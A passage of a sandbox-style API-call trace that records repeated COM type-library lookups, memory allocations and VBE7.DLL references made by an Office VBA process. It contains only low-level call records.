Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.452] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.452] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.452] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.452] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.452] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.452] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.452] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.452] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.452] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d3984b8a60, cb=0x800) returned 0x1d39863a050 [0060.452] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.453] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.453] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.453] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.453] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.453] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.453] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.453] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.453] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.453] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.453] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.453] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.453] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.453] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.453] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.453] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.453] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.453] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.453] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.453] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.453] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.453] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.453] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.453] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.453] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.453] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.454] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.454] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.454] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.454] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.454] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.454] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.454] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.454] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.454] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.454] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.454] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.454] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.454] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.454] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.454] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.454] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.454] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.454] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.454] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.454] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.454] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.454] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.454] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.454] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.454] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.455] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.455] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.455] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.455] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.455] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.455] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.455] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.455] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.455] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.455] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.455] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.455] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.455] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.455] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.455] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.455] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.455] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.455] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.455] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.455] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.455] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.455] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.456] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.456] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.456] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.456] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.456] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.456] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.456] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.456] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.456] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.456] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.456] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.456] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.456] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.456] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.456] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.456] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.456] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.456] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.456] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.456] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.456] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.456] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.456] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.456] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.456] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.456] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.457] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.457] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.457] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.457] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.457] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.457] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.457] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.457] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.457] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.457] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.457] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.457] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.457] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.457] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.457] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.457] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.457] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.457] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.457] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.457] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.457] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.457] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.457] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.458] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.458] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.458] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.458] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.458] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.458] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.458] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.458] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.458] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.458] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.458] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.458] 